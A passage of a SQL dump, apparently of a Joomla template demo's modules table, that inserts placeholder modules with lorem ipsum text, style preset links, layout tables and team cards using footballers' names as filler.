\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(161,0,'box alert','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>',1,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"box-alert\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(162,0,'box info','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>',1,'contentbottom-2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"box-info\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(165,0,'box2 title2','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>',7,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"box2 title2\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(166,0,'box1 title3','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>',8,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"box1 title3\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(168,0,'Sidebar B','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>',9,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"border title-red\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(176,0,'Preset Styles','','<ul>\n <li class=\"grouped\">\n <a href=\"#\">Light Style</a>\n <ul>\n <li><a href=\"index.php?style=blue\">Blue</a></li>\n <li><a href=\"index.php?style=mblue\">Midnight Blue</a></li>\n <li><a href=\"index.php?style=green\">Green</a></li>\n <li><a href=\"index.php?style=orange\">Orange</a></li>\n <li><a href=\"index.php?style=purple\">Purple</a></li>\n <li><a href=\"index.php?style=red\">Red</a></li>\n\n\n </ul> \n </li>\n \n <li class=\"grouped\">\n <a href=\"#\">Dark Style</a>\n <ul>\n <li><a href=\"index.php?style=dark-blue\">Blue</a></li>\n <li><a href=\"index.php?style=dark-mblue\">Midnight Blue</a></li>\n <li><a href=\"index.php?style=dark-green\">Green</a></li>\n <li><a href=\"index.php?style=dark-orange\">Orange</a></li>\n <li><a href=\"index.php?style=dark-purple\">Purple</a></li>\n <li><a href=\"index.php?style=dark-red\">Red</a></li>\n </ul> \n </li>\n</ul>',1,'mega2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"nostyle\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(177,0,'Responsive Layout','','<p><i class=\"icon-desktop icon-10x\"></i><i class=\"icon-mobile-phone icon-5x\"></i></p>\r\n<h3 class=\"title\">Responsive</h3>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc vitae elit arcu, quis suscipit ipsum. Ut eu nisi ac eros tincidunt tempus.</p>\r\n<p><a class=\"readon\" href=\"#\"><span>Read More</span></a></p>',1,'feature-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"align-center\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(178,0,'Html5','','<p><i class=\"icon-html5 icon-10x\"></i><i class=\"icon-css3 icon-10x\"></i></p>\r\n<h3 class=\"title\">HTML5 & Css3</h3>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc vitae elit arcu, quis suscipit ipsum. Ut eu nisi ac eros tincidunt tempus.</p>\r\n<p><a class=\"readon\" href=\"#\"><span>Read More</span></a></p>',1,'feature-2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"align-center\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(179,0,'Extremly Flexible','','<p><i class=\"icon-cog icon-spin icon-10x\"></i></p>\r\n<h3 class=\"title\">Extremely Flexible</h3>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc vitae elit arcu, quis suscipit ipsum. Ut eu nisi ac eros tincidunt tempus.</p>\r\n<p><a class=\"readon\" href=\"#\"><span>Read More</span></a></p>',1,'feature-3',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"align-center\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(181,0,'About expose','','<div class=\"master-head\">\r\n<h2 class=\"font-xlarge align-center\">The Expose Framework</h2> \r\n\r\n <div class=\"width-40 width-block\">\r\n <h3 style=\"font-weight: normal;\">Flexible and powerful rapid theme development framework for developing, maintaining, and deploying high quality themes.</h3> \r\n <span class=\"btn-wrap\">\r\n <a class=\"btn btn-large btn-block btn-primary square\" href=\"http://www.themexpert.com/expose\" target=\"_blank\">Learn More</a>\r\n <a class=\"btn btn-large btn-block btn-warning square\" href=\"http://www.themexpert.com/expose\" target=\"_blank\">Download</a>\r\n </span>\r\n </div>\r\n <div class=\"width-60 width-block\">\r\n <img class=\"pull-right auto-size\" src=\"images/master-head.png\" alt=\"Expose4 is responsive\" /> \r\n </div>\r\n\r\n</div>',1,'utility-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"nomargin-bottom nopadding-bottom\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(182,0,'Who\'s Online','','',5,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_whosonline',1,1,'{\"showmode\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-user\",\"cache\":\"0\",\"filter_groups\":\"0\"}',0,'*'),(183,0,'Quickstart Available','','<p class=\"align-center\">\r\n <i class=\"icon-dropbox icon-10x\"></i> <br />\r\n Expert Explorer formally known as Quickstart pack is a complete Joomla installation pack comes with our template settings. Available for Bootstrap template.\r\n</p>\r\n<p class=\"align-center\">\r\n <a href=\"http://www.themexpert.com/documentation/tutorials/what-is-expert-explorer-and-how-to-install-it\" target=\"_blank\" class=\"btn btn-primary\">Learn more</a>\r\n</p>',4,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"box1 icon-rocket\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(184,0,'box1','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>',2,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"box1\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(185,0,'box2','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>',2,'contentbottom-2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"box2\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(186,0,'box error','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>',1,'contentbottom-4',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"box-error\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(187,0,'box success','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>',1,'contentbottom-3',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"box-success\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(193,0,'Module Variations Info','','<p>\r\n <strong>You can use module class combo such as \'box1 title1\'.</strong>\r\n</p>',4,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"alert alert-info\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(196,0,'Tab 1','','<p>Expose has built-in Tab layout for module. Select Tab from Expose Settings → Layout → Module Position → Module Style Chrome button. </p>\r\n<a class=\"btn btn-primary\" target=\"_blank\" href=\"http://docs.themexpert.com/getting-started/module-positions.html\">Learn More</a>',1,'contenttop-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(197,0,'Accordion 1','','<p>Expose has built-in Accordion layout for module. Select Accordion from Expose Settings → Layout → Module Position → Module Style Chrome button. </p>\r\n<a class=\"btn btn-primary\" target=\"_blank\" href=\"http://docs.themexpert.com/getting-started/module-positions.html\">Learn More</a>',1,'contenttop-2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"box1\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(198,0,'Collapsible Module','','<p>If no modules are published to a position, the entire area or row will not appear or collapse.</p>\r\n',1,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"box1 icon-th\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(199,0,'Expose Widgets','','<p><img src=\"images/features/widgets.jpg\" alt=\"Expose Widgets\" /></p>\r\n<p>Widgets are tiny little features which enhence templates capability and power. Expose widget based architecture gives ability to create a powerful widgets within a short span of time and are injected into a position when enabled.</p>',1,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-puzzle-piece box2\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(200,0,'Tab 2','','<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam faucibus lobortis mi id luctus.</p>\r\n<a class=\"btn btn-primary\" href=\"#\">Read More</a>',1,'contenttop-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(202,0,'Typography','','',1,'sidebar-a',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"typography\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"nav nav-list\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"well\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(203,0,'Typography Notice','','<p class=\"alert alert-info\">\r\n The documented typography is based on <a href=\"http://twitter.github.com/bootstrap/base-css.html\" target=\"_blank\">Twitter Bootstrap</a> framework.\r\n</p>',1,'contenttop-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"nomargin-top nomargin-bottom nopadding-bottom nopadding-left nopadding-right\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(205,0,'User Login','','',10,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_login',1,1,'{\"pretext\":\"\",\"posttext\":\"\",\"login\":\"\",\"logout\":\"\",\"greeting\":\"1\",\"name\":\"0\",\"usesecure\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',0,'*'),(206,0,'About Expose','','<p>Expose is a powerful and flexible template development framework provide rich toolset to develop and maintain high quality Joomla template. Expose built with latest technoloty such as HTML5, CSS3, Modernizr.</p> \r\n<p><a class=\"btn btn-primary\" href=\"http://www.themexpert.com/expose\">Learn More</a></p>',1,'footer-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(207,0,'Useful Links','','<ul>\r\n <li><a href=\"http://www.joomla.org\" target=\"_blank\">Joomla!</a></li>\r\n <li><a href=\"http://twitter.github.com/bootstrap\" target=\"_blank\">Twitter Bootstrap</a></li>\r\n <li><a href=\"http://lesscss.org\" target=\"_blank\">LESS Website</a></li>\r\n <li><a href=\"http://en.wikipedia.org/wiki/HTML5\" target=\"_blank\">HTML5</a></li>\r\n <li><a href=\"http://www.themexpert.com/expose\" target=\"_blank\">Expose Website</a></li>\r\n <li><a href=\"http://www.themexpert.com/expose\" target=\"_blank\">Download</a></li>\r\n</ul>',1,'footer-2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"no-style\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(208,0,'Social','','<p>Get update instantly from our social channel.</p>',1,'footer-3',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"nomargin nopadding\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(209,0,'Newsletter','','<p>Complete the form below, and we\'ll send you an e-mail every now and again with all the latest Expose news.</p>\r\n<form>\r\n <div class=\"input-append\">\r\n <input class=\"width-80\" id=\"appendedInputButton\" type=\"text\" />\r\n <button class=\"btn btn-primary\" type=\"button\">Go!</button>\r\n</div>\r\n</form>\r\n',1,'footer-4',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(210,0,'box3','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>',2,'contentbottom-3',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"box3\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(211,0,'box4','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>',2,'contentbottom-4',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"box4\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(212,0,'title1','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>',2,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"title1\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(213,0,'title2','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>',2,'contentbottom-2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"title2\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(214,0,'title3','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>',2,'contentbottom-3',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"title3\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(215,0,'title4','','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>',2,'contentbottom-4',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"title4\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(216,0,'Accordion 2','','<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam faucibus lobortis mi id luctus.</p>\r\n<a class=\"btn btn-primary\" href=\"#\">Read More</a>',1,'contenttop-2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-th\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(217,0,'Expose Grid','','<p>Configure at Admin → Extensions → Template Manager → Select Template, then go to Layout to set the grid widths and allocated positions.</p>\r\n<p><img src=\"images/features/layouts.jpg\" alt=\"Expose Layouts\" /></p>',2,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-th box1\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(218,0,'Configurator','','<p><img src=\"images/features/configurator.jpg\" alt=\"Expose Configurator\" /></p>\r\n<p>Save your template settings and load them anytime from Expose Configurator.</p>\r\n',3,'sidebar-b',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-edit box4\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(219,0,'Mainbody / Sidebar Layouts','','<h3 class=\"alert alert-info align-center\">Layout-1</h3>\r\n<div class=\"clearfix\">\r\n <div class=\"width-30 pull-left\">\r\n <table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"1\"><h5>Sidebar</h5></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>A</td>\r\n </tr>\r\n </tbody>\r\n </table>\r\n </div>\r\n \r\n <div class=\"width-30 pull-left\">\r\n <table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"1\"><h5>Mainbody</h5></th>\r\n </tr>\r\n </thead>\r\n </table>\r\n </div>\r\n \r\n <div class=\"width-30 pull-left\">\r\n <table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"1\"><h5>Sidebar</h5></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>B</td>\r\n </tr>\r\n </tbody>\r\n </table>\r\n </div>\r\n</div>\r\n\r\n<h3 class=\"alert alert-info align-center\">Layout-2</h3>\r\n<div class=\"clearfix\">\r\n <div class=\"width-30 pull-left\">\r\n <table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"1\"><h5>Sidebar</h5></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>A</td>\r\n </tr>\r\n </tbody>\r\n </table>\r\n </div>\r\n \r\n <div class=\"width-30 pull-left\">\r\n <table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"1\"><h5>Sidebar</h5></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>B</td>\r\n </tr>\r\n </tbody>\r\n </table>\r\n </div>\r\n \r\n <div class=\"width-30 pull-left\">\r\n <table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"1\"><h5>Mainbody</h5></th>\r\n </tr>\r\n </thead>\r\n </table>\r\n </div>\r\n\r\n</div>\r\n\r\n<h3 class=\"alert alert-info align-center\">Layout-3</h3>\r\n<div class=\"clearfix\">\r\n \r\n <div class=\"width-30 pull-left\">\r\n <table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"1\"><h5>Mainbody</h5></th>\r\n </tr>\r\n </thead>\r\n </table>\r\n </div>\r\n \r\n <div class=\"width-30 pull-left\">\r\n <table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"1\"><h5>Sidebar</h5></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>A</td>\r\n </tr>\r\n </tbody>\r\n </table>\r\n </div>\r\n \r\n <div class=\"width-30 pull-left\">\r\n <table class=\"table table-bordered align-center\">\r\n <thead>\r\n <tr>\r\n <th colspan=\"1\"><h5>Sidebar</h5></th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>B</td>\r\n </tr>\r\n </tbody>\r\n </table>\r\n </div>\r\n\r\n</div>',1,'mainbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-desktop box1\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(220,0,'test','','<a href=\"#\">test</a>',0,'header-2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(221,0,'Meet The Team || Lorem Ipsum is simply dummy text of the printing and typesetting industry','','<div class=\"width-33\">\n <div class=\"block\">\n <img src=\"images/pages/team/img1.jpg\" alt=\"\" />\n <h3>Lionel Messi</h3>\n <h4>CEO</h4>\n <div class=\"social-links\">\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\n </div>\n </div>\n</div>\n\n <div class=\"width-33\">\n <div class=\"block\">\n <img src=\"images/pages/team/img3.jpg\" alt=\"\" />\n <h3>Cristiano Ronaldo</h3>\n <h4>Co-Founder</h4>\n <div class=\"social-links\">\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\n </div>\n </div>\n</div>\n\n <div class=\"width-33\">\n <div class=\"block\">\n <img src=\"images/pages/team/img2.jpg\" alt=\"\" />\n <h3>Neymar</h3>\n <h4>VP Marketing</h4>\n <div class=\"social-links\">\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\n </div>\n </div>\n</div>',1,'contentbottom-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"align-center team\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(222,0,'Our Awesome Team Members','Team polaroid on About us Page 1','<div class=\"width-25\">\r\n <div class=\"block\">\r\n <img src=\"images/pages/team/img4.jpg\" alt=\"\" />\r\n <h3>Wayne Rooney</h3>\r\n <h4>CTO</h4>\r\n <div class=\"social-links\">\r\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\r\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\r\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\r\n </div>\r\n </div>\r\n</div>\r\n\r\n<div class=\"width-25\">\r\n <div class=\"block\">\r\n <img src=\"images/pages/team/img5.jpg\" alt=\"\" />\r\n <h3>Zlatan Ibrahimović</h3>\r\n <h4>Front End Engineer</h4>\r\n <div class=\"social-links\">\r\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\r\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\r\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\r\n </div>\r\n </div>\r\n</div>\r\n\r\n<div class=\"width-25\">\r\n <div class=\"block\">\r\n <img src=\"images/pages/team/img6.jpg\" alt=\"\" />\r\n <h3>Edinson Cavani</h3>\r\n <h4>Graphic Designer</h4>\r\n <div class=\"social-links\">\r\n <a href=\"//www.facebook.com/ThemeXpert\"><span class=\"icon-facebook\"></span></a>\r\n <a href=\"//www.twitter.com/ThemeXpert\"><span class=\"icon-twitter\"></span></a>\r\n <a href=\"//plus.google.com/102243594488216874926\"><span class=\"icon-google-plus\"></span></a>\r\n </div>\r\n 